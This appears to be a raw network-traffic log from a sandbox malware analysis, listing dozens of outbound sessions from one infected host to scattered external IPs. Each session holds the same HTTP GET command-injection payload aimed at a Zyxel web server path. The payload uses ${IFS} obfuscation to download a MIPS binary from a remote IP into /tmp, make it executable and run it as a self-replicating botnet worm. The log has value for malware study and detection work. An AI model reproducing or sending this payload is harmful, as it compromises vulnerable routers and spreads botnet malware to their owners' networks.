                                              Jan 29, 2024 07:03:38.788914919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1538192.168.2.1455420130.116.159.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788933992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1539192.168.2.14574208.167.73.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.788980007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1540192.168.2.1435716203.19.153.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789011955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1541192.168.2.1450680211.66.3.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789038897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1542192.168.2.1439816197.9.154.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789088011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1543192.168.2.1448670108.174.63.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789129972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1544192.168.2.145546493.142.204.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789160013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1545192.168.2.143611463.165.202.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789202929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1546192.168.2.1445626143.195.132.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789243937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1547192.168.2.1446760154.122.97.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789273024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1548192.168.2.1446810107.178.245.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789309978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1549192.168.2.1454798208.85.26.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789361000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1550192.168.2.1439284146.28.190.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789376974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1551192.168.2.144472049.246.182.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789433956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1552192.168.2.1437218156.54.164.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789458036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1553192.168.2.1457140142.67.61.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789494991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1554192.168.2.144856213.35.79.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789546013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1555192.168.2.145479650.147.94.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789580107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1556192.168.2.1447000204.191.205.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789611101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1557192.168.2.144634057.174.115.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789664030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1558192.168.2.1437016148.118.164.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789686918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1559192.168.2.1456436153.22.68.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789726973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1560192.168.2.1447992149.165.45.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789776087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1561192.168.2.1452958178.40.175.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789800882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1562192.168.2.145592043.77.117.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789850950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1563192.168.2.1450500142.252.134.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789891958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1564192.168.2.14590809.96.192.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789923906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1565192.168.2.144555096.60.176.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.789968967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1566192.168.2.1460266223.22.212.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790015936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1567192.168.2.1445382185.22.22.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790059090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1568192.168.2.1454102176.246.173.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790096998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1569192.168.2.143495499.246.89.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790121078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1570192.168.2.144530013.60.209.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790159941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1571192.168.2.1448804109.1.252.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790203094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1572192.168.2.1439876152.151.132.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790250063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1573192.168.2.1444724106.89.24.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790283918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1574192.168.2.1451264156.56.3.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790318966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1575192.168.2.145383051.102.78.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790357113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1576192.168.2.144150249.43.139.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790385962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1577192.168.2.1455732135.37.43.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790452003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1578192.168.2.143344882.99.56.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790469885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1579192.168.2.1459996156.131.64.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790535927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1580192.168.2.144733863.152.147.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790564060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1581192.168.2.144700854.237.34.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790620089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1582192.168.2.1458056109.95.255.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790669918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1583192.168.2.1447818208.181.74.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790699959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1584192.168.2.1439148118.118.210.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790749073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1585192.168.2.143687460.29.25.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790776968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1586192.168.2.145545631.71.185.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790832996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1587192.168.2.145369089.136.221.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790860891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1588192.168.2.1447964187.164.129.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790884972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1589192.168.2.143394867.185.40.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790905952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1590192.168.2.1455796138.8.21.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.790978909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1591192.168.2.1454358222.63.254.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791006088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1592192.168.2.14562721.226.245.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791060925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1593192.168.2.1442380186.41.182.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791111946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1594192.168.2.1459342219.104.109.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791150093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1595192.168.2.144748837.21.102.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791182041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1596192.168.2.1456232103.223.177.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791219950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1597192.168.2.1455188120.11.41.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791265965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1598192.168.2.1444054148.94.144.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791282892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1599192.168.2.1454270167.20.3.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791382074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1600192.168.2.1444416130.39.210.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791414976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1601192.168.2.1446620137.254.102.252443
                                              TimestampBytes transferredDirectionData
